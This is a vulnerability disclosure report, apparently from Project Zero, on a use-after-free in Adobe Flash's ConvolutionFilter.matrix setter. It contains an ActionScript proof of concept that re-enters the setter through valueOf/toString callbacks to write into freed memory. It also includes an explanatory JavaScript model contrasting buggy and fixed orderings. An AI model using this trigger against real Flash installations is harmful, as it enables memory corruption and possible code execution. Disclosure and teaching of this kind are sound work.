Adobe Flash: Setting ConvolutionFilter.matrix can write to memory that has already been freed

Reported by natashenka@google.com (Project Member), Jan 30 2015
Setting ConvolutionFilter.matrix from inside the ConvolutionFilter.matrix setter (re-entering it from a toString/valueOf callback that runs while the array elements are converted) can cause memory corruption, because the setter writes through a pointer to memory that has already been freed.

A minimal PoC is below; the full source and a swf are attached to the report.
```actionscript
// Filter whose matrix setter will be re-entered from the element conversion callback.
var filter:flash.filters.ConvolutionFilter = new flash.filters.ConvolutionFilter(3, 3, [1, 1, 1, 1, 1, 1, 1, 1, 1], 9, 0, true, false, 0x0000FF, alpha);

// Array element whose toString/valueOf run script when the setter converts it.
var n = {};
n.toString = ts;
n.valueOf = ts;
var a = [];
for(var k = 0; k < 1; k++){
    a[k] = n;
}

var iff = 0;
filter.matrix = a;

function ts(){
    // Re-enter the matrix setter a bounded number of times.
    if (iff < 10){
        iff++;
        filter.matrix = a;
    }
    var q = "";
    for(var j = 0; j < 10000; j++){
        var qq = "9";
    }
    return 0x77777777;
}
```
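As an added illustration, not code from the bug report or from Flash Player, the following JavaScript models the ordering defect the PoC relies on: a setter that releases its existing storage and then converts each array element, where conversion can run script (`valueOf`) that re-enters the setter and releases the block still being written. The `Heap`, `Block`, `BuggyFilter`, `FixedFilter` and `runScenario` names and the three-element input are constructed for this model; the heap counts writes into released blocks instead of corrupting real memory. The fixed variant shows the usual remedy for this bug class: convert every element into plain values first, and only then replace the storage, so no script can run between free and use.

```javascript
// Added model of the bug class; none of this is Flash Player or report code.
// A tiny allocator that remembers whether a block was released, so a write
// into released storage can be counted rather than corrupting real memory.
class Block {
  constructor(n) { this.data = new Array(n).fill(0); this.freed = false; }
}

class Heap {
  constructor() { this.uafWrites = 0; }
  alloc(n) { return new Block(n); }
  free(block) { block.freed = true; }
  store(block, i, v) {
    if (block.freed) this.uafWrites++;  // write after free: the defect we detect
    block.data[i] = v;
  }
}

class FilterBase {
  constructor(heap, size) {
    this.heap = heap;
    this.size = size;
    this.buf = heap.alloc(size);
  }
}

// Buggy ordering: storage is replaced first, then each element is converted
// while writing into the new block. Number(x) runs user script (valueOf), and
// that script may re-enter setMatrix and release the block still in use.
class BuggyFilter extends FilterBase {
  setMatrix(values) {
    this.heap.free(this.buf);
    const block = this.heap.alloc(this.size);
    this.buf = block;
    for (let i = 0; i < this.size; i++) {
      this.heap.store(block, i, Number(values[i]));  // may re-enter here
    }
  }
}

// Fixed ordering: convert everything into a local array of plain numbers
// first; only then touch the storage, with no script able to run between
// releasing the old block and writing the new one.
class FixedFilter extends FilterBase {
  setMatrix(values) {
    const plain = [];
    for (let i = 0; i < this.size; i++) plain.push(Number(values[i]));
    const block = this.heap.alloc(this.size);
    for (let i = 0; i < this.size; i++) this.heap.store(block, i, plain[i]);
    this.heap.free(this.buf);
    this.buf = block;
  }
}

// Drive one filter with elements whose valueOf re-enters the setter up to
// maxDepth times (constructed counterpart of the PoC's ts() callback).
function runScenario(FilterClass, maxDepth) {
  const heap = new Heap();
  const size = 3;
  const filter = new FilterClass(heap, size);
  let depth = 0;
  const reentrant = {
    valueOf() {
      if (depth < maxDepth) {
        depth++;
        filter.setMatrix(values);
      }
      return 7;
    },
  };
  const values = [reentrant, reentrant, reentrant];
  filter.setMatrix(values);
  return { uafWrites: heap.uafWrites, liveBuffer: !filter.buf.freed };
}

console.log("buggy:", runScenario(BuggyFilter, 2));  // uafWrites: 6
console.log("fixed:", runScenario(FixedFilter, 2));  // uafWrites: 0
```

With two levels of re-entry and a three-element matrix, every outer invocation of the buggy setter finishes its loop by writing into a block that an inner invocation already released (six writes in total), while the filter's final pointer still looks valid; the fixed ordering produces no such write because all conversions complete before any block changes hands.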
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Comment 1 by cevans@google.com, Feb 2 2015; further comments Apr 10 2015, Apr 14 2015, Apr 24 2015